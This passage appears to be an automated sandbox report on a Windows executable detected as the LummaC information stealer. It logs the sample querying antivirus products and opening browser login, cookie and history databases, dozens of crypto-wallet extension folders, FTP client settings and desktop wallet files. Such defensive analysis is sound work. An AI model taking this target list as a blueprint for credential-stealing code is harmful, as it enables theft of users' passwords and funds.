            Source: C:\Users\user\Desktop\k6A01XaeEn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: k6A01XaeEn.exe, 00000000.00000003.2004947838.000000000321D000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2004853942.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2088559309.0000000003224000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2018318661.0000000003220000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2004993574.0000000003224000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: k6A01XaeEn.exe PID: 7736, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
